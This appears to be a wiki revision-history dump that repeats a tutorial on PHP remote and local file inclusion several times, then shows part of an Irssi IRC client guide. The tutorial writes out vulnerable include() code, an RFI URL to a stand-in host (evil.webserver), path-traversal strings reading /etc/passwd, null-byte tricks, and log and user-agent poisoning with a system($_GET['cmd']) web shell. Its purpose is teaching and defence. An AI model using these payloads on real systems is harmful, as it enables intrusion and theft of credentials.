To [[patch]] this type of [[vulnerability]], one may employ whitelisting or simply stop allowing user input to specify files for inclusion. There are many prepackaged solutions and techniques to stop file inclusion vulnerabilities, although most of them can be bypassed with enough ingenuity. Where possible, it is better to avoid allowing user input to be directly translated into a file inclusion path. <br />
<br />
{{info|This could be classified as a [[Design Flaws|design flaw]] in [[PHP]] for allowing the inclusion of remote files to begin with, or for accepting a variable in its '''include()''' function.}}<br />
<br />
==Remote File Inclusion==<br />
<br />
The example URI of a vulnerable site will be '''/include.php?file=howto.php''' <br />
<br />
[[PHP|PHP]] for this may look like:<br />
<br />
{{code<br />
|text=<br />
<source lang="html4strict"><br />
<HTML><br />
<TITLE>Page Title</TITLE><br />
<BODY><br />
</source><br />
<source lang="php"><br />
<?php<br />
include($_GET['file']);<br />
?><br />
</source><br />
<source lang="html4strict"><br />
</BODY></HTML><br />
</source><br />
}}<br />
<br />
{{warning|The above [[PHP]] code is [[vulnerability|vulnerable]]. Do not use this on your site!}}<br />
An attacker that sees<br />
<br />
/include.php?file=howto.php<br />
<br />
may change the URL to<br />
<br />
<nowiki>/include.php?file=http://evil.webserver/include.txt</nowiki><br />
<br />
and then gain access to every single username and [[password]] (or [[password]] hash) that is stored in the [[database]]. This can also allow for remote code execution as well as the spawning of a remote shell.<br />
<br />
{{notice|This is known as Remote File Inclusion or RFI.}}<br />
<br />
==Local File Inclusion==<br />
<br />
Local file inclusion can be just as dangerous if not more so. Local file inclusion occurs when the [[PHP|PHP]] code at '''/local.php?file=welcome''' looks similar to the following, however '''allow_url_fopen''' and '''allow_url_includes''' has been disabled in the [[PHP]] configuration. This will only allow the attacker to access local files:<br />
<br />
{{code<br />
|text=<br />
<source lang="php"><br />
<?php<br />
include($_GET['file']);<br />
?><br />
</source><br />
<br />
}}<br />
<br />
This is similar to the Remote File Inclusion [[vulnerability]], however reviewing the code it can be seen that [[PHP|PHP]] is reading from a file on the local machine and then displaying it on the web page. The problem with this type of code is that now, instead of relinquishing execute, write, and read level permissions to an attacker, the [[programmer]] has still relinquished read level permissions to the attacker. Using this knowledge, the attacker can then specify a file on the remote host that the [[PHP|PHP]] server has permission to read and that file will be displayed in the web page. For example, the name of the file that contains the registry in windows is ntusers.dat in the windows directory. The attacker may request the URL:<br />
<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../WINDOWS/ntusers.dat</nowiki><br />
<br />
Because local.php is vulnerable, it will display the registry of vuln.net in the attacker’s web browser. The attacker can then use the information gleaned from the registry to gather username and [[password]] hash combinations and begin cracking them. The first time the attacker sees a URL containing '''.php?file=''', the attacker will most likely attempt a remote file inclusion. If that fails, the attacker will then most likely attempt local file inclusion. Both of these techniques can be used for [[XSS|cross-site scripting]] attacks.<br />
<br />
{{info|A null [[byte|Byte]] can be used to prevent concatenation in a script. For example, many scripts may append '.php' to a user supplied string in an include. Appending a null [[byte|Byte]] (%00) will often short circuit this, allowing an attacker to include any file, regardless of extension.}}<br />
<br />
If the remote host is a UNIX or [[Linux]] based system, the attacker may be able to view /etc/passwd or /proc/cpuinfo with this technique:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../etc/passwd</nowiki><br />
<br />
Or using null-bytes:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../etc/passwd%00</nowiki><br />
<br />
Because the file is being included, this means that the attacker can see it if it is a text file, or execute any [[PHP|php]] inside of it.<br />
<br />
Two common [[Input|input]] vectors for injecting [[PHP|PHP]] code are the "user-agent" and the httpd error log. The user-agent can be accessed through '''/proc/self/environ'''. Therefore, if a browser sends a user-agent string containing [[PHP|PHP]] code :<br />
{{code<br />
|text=<br />
<source lang="php"><br />
<?php<br />
system($_GET['cmd']);<br />
?><br />
</source><br />
}}<br />
<br />
{{warning|The above [[PHP]] code is [[vulnerability|vulnerable]]. Do not use this on your site!}}<br />
<br />
and accesses the file:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../proc/self/environ?cmd=whoami</nowiki><br />
<br />
They can retrieve the [[Linux]] or Unix username (output of the whoami command) in the return [[HTML]] of the [[PHP|PHP]] file.<br />
<br />
The other method is to use the telnet command and cause a 404 error with a GET request:<br />
{{code<br />
|text=<br />
<br />
<br />
<source lang="php"><br />
<br />
<br />
GET <?php system($_GET['cmd']) ?> <br />
</source><br />
<br />
}}<br />
<br />
And then retrieve the following URL for the same output:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../usr/local/apache/log/error_log?cmd=whoami</nowiki><br />
<br />
{{notice|Log file location may vary}}<br />
<br />
----<br />
{{exploitation}}<br />
{{social}}<br />
<br />
[[category:Web exploitation]]</div>DPYJulietowbaijchttps://nets.ec/index.php?title=File_Inclusion&diff=7656File Inclusion2012-06-28T20:15:47Z<p>DPYJulietowbaijc: </p>
<hr />
<div>File inclusion refers to the process of manipulating unsanitised inputs that make use of PHP's include() function into including files that were not intended to be included. This can be used for the disclosure of privileged information (such as the contents of the /etc/shadow file) or including a file that contains some arbitrary code created by the attacker, and thus causing the server to run this code. <b>File inclusion</b> refers in a general sense to the inclusion of an unintended file, whereas <b>file disclosure</b> refers specifically to using file inclusion to obtain sensitive information.<br />
<br />
File inclusion is a vulnerability that exists because of [[PHP]]'s include() function accepting a variable as a parameter. <br />
<br />
__FORCETOC__<br />
<br />
==Introduction==<br />
:''This attack can be automated quickly using [[lfi_autopwn.pl]].''<br />
This function does not merely include a library like in [[C]], however executes the code as well. <br />
When a [[programmer]] allows a file to be selected for inclusion via any [[Web_Exploitation#Attack_Vectors|HTTP input]], this creates a '''File Inclusion''' [[vulnerability]].<br />
To [[patch]] this type of [[vulnerability]], one may employ whitelisting or simply stop allowing user input to specify files for inclusion. <br />
<br />
{{info|This could be classified as a [[Design Flaws|design flaw]] in [[PHP]] for allowing the inclusion of remote files to begin with, or for accepting a variable in its '''include()''' function.}}<br />
<br />
==Remote File Inclusion==<br />
<br />
The example URI of a vulnerable site will be '''/include.php?file=howto.php''' <br />
<br />
[[PHP|PHP]] for this may look like:<br />
<br />
{{code<br />
|text=<br />
<source lang="html4strict"><br />
<HTML><br />
<TITLE>Page Title</TITLE><br />
<BODY><br />
</source><br />
<source lang="php"><br />
<?php<br />
include($_GET['file']);<br />
?><br />
</source><br />
<source lang="html4strict"><br />
</BODY></HTML><br />
</source><br />
}}<br />
<br />
{{warning|The above [[PHP]] code is [[vulnerability|vulnerable]]. Do not use this on your site!}}<br />
An attacker that sees<br />
<br />
/include.php?file=howto.php<br />
<br />
may change the URL to<br />
<br />
<nowiki>/include.php?file=http://evil.webserver/include.txt</nowiki><br />
<br />
and then gain access to every single username and [[password]] (or [[password]] hash) that is stored in the [[database]]. This can also allow for remote code execution as well as the spawning of a remote shell.<br />
<br />
{{notice|This is known as Remote File Inclusion or RFI.}}<br />
<br />
==Local File Inclusion==<br />
<br />
Local file inclusion can be just as dangerous if not more so. Local file inclusion occurs when the [[PHP|PHP]] code at '''/local.php?file=welcome''' looks similar to the following, however '''allow_url_fopen''' and '''allow_url_includes''' has been disabled in the [[PHP]] configuration. This will only allow the attacker to access local files:<br />
<br />
{{code<br />
|text=<br />
<source lang="php"><br />
<?php<br />
include($_GET['file']);<br />
?><br />
</source><br />
<br />
}}<br />
<br />
This is similar to the Remote File Inclusion [[vulnerability]], however reviewing the code it can be seen that [[PHP|PHP]] is reading from a file on the local machine and then displaying it on the web page. The problem with this type of code is that now, instead of relinquishing execute, write, and read level permissions to an attacker, the [[programmer]] has still relinquished read level permissions to the attacker. Using this knowledge, the attacker can then specify a file on the remote host that the [[PHP|PHP]] server has permission to read and that file will be displayed in the web page. For example, the name of the file that contains the registry in windows is ntusers.dat in the windows directory. The attacker may request the URL:<br />
<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../WINDOWS/ntusers.dat</nowiki><br />
<br />
Because local.php is vulnerable, it will display the registry of vuln.net in the attacker’s web browser. The attacker can then use the information gleaned from the registry to gather username and [[password]] hash combinations and begin cracking them. The first time the attacker sees a URL containing '''.php?file=''', the attacker will most likely attempt a remote file inclusion. If that fails, the attacker will then most likely attempt local file inclusion. Both of these techniques can be used for [[XSS|cross-site scripting]] attacks.<br />
<br />
{{info|A null [[byte|Byte]] can be used to prevent concatenation in a script. For example, many scripts may append '.php' to a user supplied string in an include. Appending a null [[byte|Byte]] (%00) will often short circuit this, allowing an attacker to include any file, regardless of extension.}}<br />
<br />
If the remote host is a UNIX or [[Linux]] based system, the attacker may be able to view /etc/passwd or /proc/cpuinfo with this technique:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../etc/passwd</nowiki><br />
<br />
Or using null-bytes:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../etc/passwd%00</nowiki><br />
<br />
Because the file is being included, this means that the attacker can see it if it is a text file, or execute any [[PHP|php]] inside of it.<br />
<br />
Two common [[Input|input]] vectors for injecting [[PHP|PHP]] code are the "user-agent" and the httpd error log. The user-agent can be accessed through '''/proc/self/environ'''. Therefore, if a browser sends a user-agent string containing [[PHP|PHP]] code :<br />
{{code<br />
|text=<br />
<source lang="php"><br />
<?php<br />
system($_GET['cmd']);<br />
?><br />
</source><br />
}}<br />
<br />
{{warning|The above [[PHP]] code is [[vulnerability|vulnerable]]. Do not use this on your site!}}<br />
<br />
and accesses the file:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../proc/self/environ?cmd=whoami</nowiki><br />
<br />
They can retrieve the [[Linux]] or Unix username (output of the whoami command) in the return [[HTML]] of the [[PHP|PHP]] file.<br />
<br />
The other method is to use the telnet command and cause a 404 error with a GET request:<br />
{{code<br />
|text=<br />
<br />
<br />
<source lang="php"><br />
<br />
<br />
GET <?php system($_GET['cmd']) ?> <br />
</source><br />
<br />
}}<br />
<br />
And then retrieve the following URL for the same output:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../usr/local/apache/log/error_log?cmd=whoami</nowiki><br />
<br />
{{notice|Log file location may vary}}<br />
<br />
----<br />
{{exploitation}}<br />
{{social}}<br />
<br />
[[category:Web exploitation]]</div>DPYJulietowbaijchttps://nets.ec/index.php?title=File_Inclusion&diff=7655File Inclusion2012-06-28T20:14:24Z<p>DPYJulietowbaijc: </p>
<hr />
<div>File inclusion refers to the process of manipulating unsanitised inputs that make use of PHP's include() function into including files that were not intended to be included. This can be used for the disclosure of privileged information (such as the contents of the /etc/shadow file) or including a file that contains some arbitrary code created by the attacker, and thus causing the server to run this code. File inclusion refers in a general sense to the inclusion of an unintended file, whereas <b>file disclosure</b> refers specifically to using file inclusion to obtain sensitive information.<br />
<br />
File inclusion is a vulnerability that exists because of [[PHP]]'s include() function accepting a variable as a parameter. <br />
<br />
__FORCETOC__<br />
<br />
==Introduction==<br />
:''This attack can be automated quickly using [[lfi_autopwn.pl]].''<br />
This function does not merely include a library like in [[C]], however executes the code as well. <br />
When a [[programmer]] allows a file to be selected for inclusion via any [[Web_Exploitation#Attack_Vectors|HTTP input]], this creates a '''File Inclusion''' [[vulnerability]].<br />
To [[patch]] this type of [[vulnerability]], one may employ whitelisting or simply stop allowing user input to specify files for inclusion. <br />
<br />
{{info|This could be classified as a [[Design Flaws|design flaw]] in [[PHP]] for allowing the inclusion of remote files to begin with, or for accepting a variable in its '''include()''' function.}}<br />
<br />
==Remote File Inclusion==<br />
<br />
The example URI of a vulnerable site will be '''/include.php?file=howto.php''' <br />
<br />
[[PHP|PHP]] for this may look like:<br />
<br />
{{code<br />
|text=<br />
<source lang="html4strict"><br />
<HTML><br />
<TITLE>Page Title</TITLE><br />
<BODY><br />
</source><br />
<source lang="php"><br />
<?php<br />
include($_GET['file']);<br />
?><br />
</source><br />
<source lang="html4strict"><br />
</BODY></HTML><br />
</source><br />
}}<br />
<br />
{{warning|The above [[PHP]] code is [[vulnerability|vulnerable]]. Do not use this on your site!}}<br />
An attacker that sees<br />
<br />
/include.php?file=howto.php<br />
<br />
may change the URL to<br />
<br />
<nowiki>/include.php?file=http://evil.webserver/include.txt</nowiki><br />
<br />
and then gain access to every single username and [[password]] (or [[password]] hash) that is stored in the [[database]]. This can also allow for remote code execution as well as the spawning of a remote shell.<br />
<br />
{{notice|This is known as Remote File Inclusion or RFI.}}<br />
<br />
==Local File Inclusion==<br />
<br />
Local file inclusion can be just as dangerous if not more so. Local file inclusion occurs when the [[PHP|PHP]] code at '''/local.php?file=welcome''' looks similar to the following, however '''allow_url_fopen''' and '''allow_url_includes''' has been disabled in the [[PHP]] configuration. This will only allow the attacker to access local files:<br />
<br />
{{code<br />
|text=<br />
<source lang="php"><br />
<?php<br />
include($_GET['file']);<br />
?><br />
</source><br />
<br />
}}<br />
<br />
This is similar to the Remote File Inclusion [[vulnerability]], however reviewing the code it can be seen that [[PHP|PHP]] is reading from a file on the local machine and then displaying it on the web page. The problem with this type of code is that now, instead of relinquishing execute, write, and read level permissions to an attacker, the [[programmer]] has still relinquished read level permissions to the attacker. Using this knowledge, the attacker can then specify a file on the remote host that the [[PHP|PHP]] server has permission to read and that file will be displayed in the web page. For example, the name of the file that contains the registry in windows is ntusers.dat in the windows directory. The attacker may request the URL:<br />
<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../WINDOWS/ntusers.dat</nowiki><br />
<br />
Because local.php is vulnerable, it will display the registry of vuln.net in the attacker’s web browser. The attacker can then use the information gleaned from the registry to gather username and [[password]] hash combinations and begin cracking them. The first time the attacker sees a URL containing '''.php?file=''', the attacker will most likely attempt a remote file inclusion. If that fails, the attacker will then most likely attempt local file inclusion. Both of these techniques can be used for [[XSS|cross-site scripting]] attacks.<br />
<br />
{{info|A null [[byte|Byte]] can be used to prevent concatenation in a script. For example, many scripts may append '.php' to a user supplied string in an include. Appending a null [[byte|Byte]] (%00) will often short circuit this, allowing an attacker to include any file, regardless of extension.}}<br />
<br />
If the remote host is a UNIX or [[Linux]] based system, the attacker may be able to view /etc/passwd or /proc/cpuinfo with this technique:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../etc/passwd</nowiki><br />
<br />
Or using null-bytes:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../etc/passwd%00</nowiki><br />
<br />
Because the file is being included, this means that the attacker can see it if it is a text file, or execute any [[PHP|php]] inside of it.<br />
<br />
Two common [[Input|input]] vectors for injecting [[PHP|PHP]] code are the "user-agent" and the httpd error log. The user-agent can be accessed through '''/proc/self/environ'''. Therefore, if a browser sends a user-agent string containing [[PHP|PHP]] code :<br />
{{code<br />
|text=<br />
<source lang="php"><br />
<?php<br />
system($_GET['cmd']);<br />
?><br />
</source><br />
}}<br />
<br />
{{warning|The above [[PHP]] code is [[vulnerability|vulnerable]]. Do not use this on your site!}}<br />
<br />
and accesses the file:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../proc/self/environ?cmd=whoami</nowiki><br />
<br />
They can retrieve the [[Linux]] or Unix username (output of the whoami command) in the return [[HTML]] of the [[PHP|PHP]] file.<br />
<br />
The other method is to use the telnet command and cause a 404 error with a GET request:<br />
{{code<br />
|text=<br />
<br />
<br />
<source lang="php"><br />
<br />
<br />
GET <?php system($_GET['cmd']) ?> <br />
</source><br />
<br />
}}<br />
<br />
And then retrieve the following URL for the same output:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../usr/local/apache/log/error_log?cmd=whoami</nowiki><br />
<br />
{{notice|Log file location may vary}}<br />
<br />
----<br />
{{exploitation}}<br />
{{social}}<br />
<br />
[[category:Web exploitation]]</div>DPYJulietowbaijchttps://nets.ec/index.php?title=File_Inclusion&diff=7654File Inclusion2012-06-28T20:13:00Z<p>DPYJulietowbaijc: </p>
<hr />
<div>File inclusion refers to the process of manipulating the include() function into including files that were not intended to be included, whether this is for the disclosure of privileged information (such as disclosing contents of the /etc/shadow file) or including a file that contains some arbitrary code created by the attacker, and thus causing the server to run this code. File inclusion refers in a general sense to the inclusion of an unintended file, whereas <b>file disclosure</b> refers specifically to using file inclusion to obtain sensitive information.<br />
<br />
File inclusion is a vulnerability that exists because of [[PHP]]'s include() function accepting a variable as a parameter. <br />
<br />
__FORCETOC__<br />
<br />
==Introduction==<br />
:''This attack can be automated quickly using [[lfi_autopwn.pl]].''<br />
This function does not merely include a library like in [[C]], however executes the code as well. <br />
When a [[programmer]] allows a file to be selected for inclusion via any [[Web_Exploitation#Attack_Vectors|HTTP input]], this creates a '''File Inclusion''' [[vulnerability]].<br />
To [[patch]] this type of [[vulnerability]], one may employ whitelisting or simply stop allowing user input to specify files for inclusion. <br />
<br />
{{info|This could be classified as a [[Design Flaws|design flaw]] in [[PHP]] for allowing the inclusion of remote files to begin with, or for accepting a variable in its '''include()''' function.}}<br />
<br />
==Remote File Inclusion==<br />
<br />
The example URI of a vulnerable site will be '''/include.php?file=howto.php''' <br />
<br />
[[PHP|PHP]] for this may look like:<br />
<br />
{{code<br />
|text=<br />
<source lang="html4strict"><br />
<HTML><br />
<TITLE>Page Title</TITLE><br />
<BODY><br />
</source><br />
<source lang="php"><br />
<?php<br />
include($_GET['file']);<br />
?><br />
</source><br />
<source lang="html4strict"><br />
</BODY></HTML><br />
</source><br />
}}<br />
<br />
{{warning|The above [[PHP]] code is [[vulnerability|vulnerable]]. Do not use this on your site!}}<br />
An attacker that sees<br />
<br />
/include.php?file=howto.php<br />
<br />
may change the URL to<br />
<br />
<nowiki>/include.php?file=http://evil.webserver/include.txt</nowiki><br />
<br />
and then gain access to every single username and [[password]] (or [[password]] hash) that is stored in the [[database]]. This can also allow for remote code execution as well as the spawning of a remote shell.<br />
<br />
{{notice|This is known as Remote File Inclusion or RFI.}}<br />
<br />
==Local File Inclusion==<br />
<br />
Local file inclusion can be just as dangerous if not more so. Local file inclusion occurs when the [[PHP|PHP]] code at '''/local.php?file=welcome''' looks similar to the following, however '''allow_url_fopen''' and '''allow_url_includes''' has been disabled in the [[PHP]] configuration. This will only allow the attacker to access local files:<br />
<br />
{{code<br />
|text=<br />
<source lang="php"><br />
<?php<br />
include($_GET['file']);<br />
?><br />
</source><br />
<br />
}}<br />
<br />
This is similar to the Remote File Inclusion [[vulnerability]], however reviewing the code it can be seen that [[PHP|PHP]] is reading from a file on the local machine and then displaying it on the web page. The problem with this type of code is that now, instead of relinquishing execute, write, and read level permissions to an attacker, the [[programmer]] has still relinquished read level permissions to the attacker. Using this knowledge, the attacker can then specify a file on the remote host that the [[PHP|PHP]] server has permission to read and that file will be displayed in the web page. For example, the name of the file that contains the registry in windows is ntusers.dat in the windows directory. The attacker may request the URL:<br />
<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../WINDOWS/ntusers.dat</nowiki><br />
<br />
Because local.php is vulnerable, it will display the registry of vuln.net in the attacker’s web browser. The attacker can then use the information gleaned from the registry to gather username and [[password]] hash combinations and begin cracking them. The first time the attacker sees a URL containing '''.php?file=''', the attacker will most likely attempt a remote file inclusion. If that fails, the attacker will then most likely attempt local file inclusion. Both of these techniques can be used for [[XSS|cross-site scripting]] attacks.<br />
<br />
{{info|A null [[byte|Byte]] can be used to prevent concatenation in a script. For example, many scripts may append '.php' to a user supplied string in an include. Appending a null [[byte|Byte]] (%00) will often short circuit this, allowing an attacker to include any file, regardless of extension.}}<br />
<br />
If the remote host is a UNIX or [[Linux]] based system, the attacker may be able to view /etc/passwd or /proc/cpuinfo with this technique:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../etc/passwd</nowiki><br />
<br />
Or using null-bytes:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../etc/passwd%00</nowiki><br />
<br />
Because the file is being included, this means that the attacker can see it if it is a text file, or execute any [[PHP|php]] inside of it.<br />
<br />
Two common [[Input|input]] vectors for injecting [[PHP|PHP]] code are the "user-agent" and the httpd error log. The user-agent can be accessed through '''/proc/self/environ'''. Therefore, if a browser sends a user-agent string containing [[PHP|PHP]] code :<br />
{{code<br />
|text=<br />
<source lang="php"><br />
<?php<br />
system($_GET['cmd']);<br />
?><br />
</source><br />
}}<br />
<br />
{{warning|The above [[PHP]] code is [[vulnerability|vulnerable]]. Do not use this on your site!}}<br />
<br />
and accesses the file:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../proc/self/environ?cmd=whoami</nowiki><br />
<br />
They can retrieve the [[Linux]] or Unix username (output of the whoami command) in the return [[HTML]] of the [[PHP|PHP]] file.<br />
<br />
The other method is to use the telnet command and cause a 404 error with a GET request:<br />
{{code<br />
|text=<br />
<br />
<br />
<source lang="php"><br />
<br />
<br />
GET <?php system($_GET['cmd']) ?> <br />
</source><br />
<br />
}}<br />
<br />
And then retrieve the following URL for the same output:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../usr/local/apache/log/error_log?cmd=whoami</nowiki><br />
<br />
{{notice|Log file location may vary}}<br />
<br />
----<br />
{{exploitation}}<br />
{{social}}<br />
<br />
[[category:Web exploitation]]</div>DPYJulietowbaijchttps://nets.ec/index.php?title=File_Inclusion&diff=7653File Inclusion2012-06-28T20:07:17Z<p>DPYJulietowbaijc: </p>
<hr />
<div>File inclusion refers to the process of manipulating the include() function into including files that were not intended to be included, whether this is for the disclosure of privileged information (such as disclosing the etc/shadow file) or including a file that contains some arbitrary code created by the attacker, and thus causing the server to run this code. File inclusion is a vulnerability that exists because of [[PHP]]'s include() function accepting a variable as a parameter. <br />
<br />
__FORCETOC__<br />
<br />
==Introduction==<br />
:''This attack can be automated quickly using [[lfi_autopwn.pl]].''<br />
This function does not merely include a library like in [[C]], however executes the code as well. <br />
When a [[programmer]] allows a file to be selected for inclusion via any [[Web_Exploitation#Attack_Vectors|HTTP input]], this creates a '''File Inclusion''' [[vulnerability]].<br />
To [[patch]] this type of [[vulnerability]], one may employ whitelisting or simply stop allowing user input to specify files for inclusion. <br />
<br />
{{info|This could be classified as a [[Design Flaws|design flaw]] in [[PHP]] for allowing the inclusion of remote files to begin with, or for accepting a variable in its '''include()''' function.}}<br />
<br />
==Remote File Inclusion==<br />
<br />
The example URI of a vulnerable site will be '''/include.php?file=howto.php''' <br />
<br />
[[PHP|PHP]] for this may look like:<br />
<br />
{{code<br />
|text=<br />
<source lang="html4strict"><br />
<HTML><br />
<TITLE>Page Title</TITLE><br />
<BODY><br />
</source><br />
<source lang="php"><br />
<?php<br />
include($_GET['file']);<br />
?><br />
</source><br />
<source lang="html4strict"><br />
</BODY></HTML><br />
</source><br />
}}<br />
<br />
{{warning|The above [[PHP]] code is [[vulnerability|vulnerable]]. Do not use this on your site!}}<br />
An attacker that sees<br />
<br />
/include.php?file=howto.php<br />
<br />
may change the URL to<br />
<br />
<nowiki>/include.php?file=http://evil.webserver/include.txt</nowiki><br />
<br />
and then gain access to every single username and [[password]] (or [[password]] hash) that is stored in the [[database]]. This can also allow for remote code execution as well as the spawning of a remote shell.<br />
<br />
{{notice|This is known as Remote File Inclusion or RFI.}}<br />
<br />
==Local File Inclusion==<br />
<br />
Local file inclusion can be just as dangerous if not more so. Local file inclusion occurs when the [[PHP|PHP]] code at '''/local.php?file=welcome''' looks similar to the following, however '''allow_url_fopen''' and '''allow_url_includes''' has been disabled in the [[PHP]] configuration. This will only allow the attacker to access local files:<br />
<br />
{{code<br />
|text=<br />
<source lang="php"><br />
<?php<br />
include($_GET['file']);<br />
?><br />
</source><br />
<br />
}}<br />
<br />
This is similar to the Remote File Inclusion [[vulnerability]], however reviewing the code it can be seen that [[PHP|PHP]] is reading from a file on the local machine and then displaying it on the web page. The problem with this type of code is that now, instead of relinquishing execute, write, and read level permissions to an attacker, the [[programmer]] has still relinquished read level permissions to the attacker. Using this knowledge, the attacker can then specify a file on the remote host that the [[PHP|PHP]] server has permission to read and that file will be displayed in the web page. For example, the name of the file that contains the registry in windows is ntusers.dat in the windows directory. The attacker may request the URL:<br />
<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../WINDOWS/ntusers.dat</nowiki><br />
<br />
Because local.php is vulnerable, it will display the registry of vuln.net in the attacker’s web browser. The attacker can then use the information gleaned from the registry to gather username and [[password]] hash combinations and begin cracking them. The first time the attacker sees a URL containing '''.php?file=''', the attacker will most likely attempt a remote file inclusion. If that fails, the attacker will then most likely attempt local file inclusion. Both of these techniques can be used for [[XSS|cross-site scripting]] attacks.<br />
<br />
{{info|A null [[byte|Byte]] can be used to prevent concatenation in a script. For example, many scripts may append '.php' to a user supplied string in an include. Appending a null [[byte|Byte]] (%00) will often short circuit this, allowing an attacker to include any file, regardless of extension.}}<br />
<br />
If the remote host is a UNIX or [[Linux]] based system, the attacker may be able to view /etc/passwd or /proc/cpuinfo with this technique:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../etc/passwd</nowiki><br />
<br />
Or using null-bytes:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../etc/passwd%00</nowiki><br />
<br />
Because the file is being included, this means that the attacker can see it if it is a text file, or execute any [[PHP|php]] inside of it.<br />
<br />
Two common [[Input|input]] vectors for injecting [[PHP|PHP]] code are the "user-agent" and the httpd error log. The user-agent can be accessed through '''/proc/self/environ'''. Therefore, if a browser sends a user-agent string containing [[PHP|PHP]] code :<br />
{{code<br />
|text=<br />
<source lang="php"><br />
<?php<br />
system($_GET['cmd']);<br />
?><br />
</source><br />
}}<br />
<br />
{{warning|The above [[PHP]] code is [[vulnerability|vulnerable]]. Do not use this on your site!}}<br />
<br />
and accesses the file:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../proc/self/environ?cmd=whoami</nowiki><br />
<br />
They can retrieve the [[Linux]] or Unix username (output of the whoami command) in the return [[HTML]] of the [[PHP|PHP]] file.<br />
<br />
The other method is to use the telnet command and cause a 404 error with a GET request:<br />
{{code<br />
|text=<br />
<br />
<br />
<source lang="php"><br />
<br />
<br />
GET <?php system($_GET['cmd']) ?> <br />
</source><br />
<br />
}}<br />
<br />
And then retrieve the following URL for the same output:<br />
<br />
<nowiki>/local.php?file=../../../../../../../../../../../../../usr/local/apache/log/error_log?cmd=whoami</nowiki><br />
<br />
{{notice|Log file location may vary}}<br />
<br />
----<br />
{{exploitation}}<br />
{{social}}<br />
<br />
[[category:Web exploitation]]</div>DPYJulietowbaijchttps://nets.ec/index.php?title=Irssi_Tutorial&diff=7497Irssi Tutorial2012-06-16T22:10:34Z<p>DPYJulietowbaijc: /* Sample config file */</p>
<hr />
<div>==Getting Irssi==<br />
* Begin by downloading Irssi from [http://irssi.org/download the Irssi download page].<br />
**Mac users can download Irssi [http://pdb.finkproject.org/pdb/package.php/irssi here] and Windows users [http://irssi.org/files/irssi-win32-0.8.12.exe here]<br />
<br />
===Debian/Ubuntu===<br />
<pre>sudo apt-get install irssi</pre><br />
<br />
===Gentoo===<br />
<pre>emerge irssi</pre><br />
<br />
===Slackware===<br />
<pre>slackware-current</pre><br />
<br />
===Frugalware===<br />
<pre>pacman -S irssi</pre><br />
<br />
===Solaris===<br />
<pre>pkg-get install irssi</pre><br />
<br />
===Arch Linux===<br />
<pre>pacman -S irssi</pre><br />
<br />
==Connecting to the IRC==<br />
<br />
<pre>irssi<br />
/connect -ssl irc.blackhatacademy.org<br />
/join #CSIII</pre><br />
<br />
== Sample config file ==<br />
<pre><br />
servers = (<br />
{<br />
address = "irc.blackhatacademy.org";<br />
chatnet = "bha";<br />
port = "6697";<br />
autoconnect = "yes";<br />
use_ssl = "yes";<br />
ssl_verify = "no";<br />
}<br />
}<br />
<br />
chatnets = {<br />
bha = {<br />
type = "IRC";<br />
nick = "Savitri";<br />
user = "arya";<br />
realname = "Llama Llama Duck";<br />
autosendcmd = "SBCONNECT";<br />
};<br />
}<br />
<br />
channels = {<br />
{ name = "#CSIII"; chatnet = "bha"; autojoin = "Yes"; },<br />
{ name = "#bha-wiki"; chatnet = "bha"; autojoin = "Yes"; }<br />
}<br />
<br />
aliases = {<br />
J = "join";<br />
WJOIN = "join -window";<br />
WQUERY = "query -window";<br />
LEAVE = "part";<br />
BYE = "quit";<br />
EXIT = "quit";<br />
SIGNOFF = "quit";<br />
DESCRIBE = "action";<br />
DATE = "time";<br />
HOST = "userhost";<br />
LAST = "lastlog";<br />
SAY = "msg *";<br />
WI = "whois";<br />
WII = "whois $0 $0";<br />
WW = "whowas";<br />
W = "who";<br />
N = "names";<br />
M = "msg";<br />
T = "topic";<br />
C = "clear";<br />
CL = "clear";<br />
K = "kick";<br />
KB = "kickban";<br />
KN = "knockout";<br />
BANS = "ban";<br />
B = "ban";<br />
MUB = "unban *";<br />
UB = "unban";<br />
IG = "ignore";<br />
UNIG = "unignore";<br />
SB = "scrollback";<br />
UMODE = "mode $N";<br />
WC = "window close";<br />
WN = "window new hide";<br />
SV = "say Irssi $J ($V) - http://irssi.org/";<br />
GOTO = "sb goto";<br />
CHAT = "dcc chat";<br />
RUN = "SCRIPT LOAD";<br />
SBAR = "STATUSBAR";<br />
INVITELIST = "mode $C +I";<br />
SBCONNECT = "MSG starburst USER IDENTIFY Savitri ohnoesmypassw0rdz";<br />
}<br />
<br />
<br />
</pre><br />
<br />
==References==<br />
*[http://irssi.org/download Irssi download page]<br />
*[http://scripts.irssi.org/ Useful Irssi scripts]<br />
<br />
[[Category:Software]][[Category:Administration]]</div>DPYJulietowbaijchttps://nets.ec/index.php?title=Irssi_Tutorial&diff=7496Irssi Tutorial2012-06-16T22:09:18Z<p>DPYJulietowbaijc: /* Connecting to the IRC */</p>
<hr />
<div>==Getting Irssi==<br />
* Begin by downloading Irssi from [http://irssi.org/download the Irssi download page].<br />
**Mac users can download Irssi [http://pdb.finkproject.org/pdb/package.php/irssi here] and Windows users [http://irssi.org/files/irssi-win32-0.8.12.exe here]<br />
<br />
===Debian/Ubuntu===<br />
<pre>sudo apt-get install irssi</pre><br />
<br />
===Gentoo===<br />
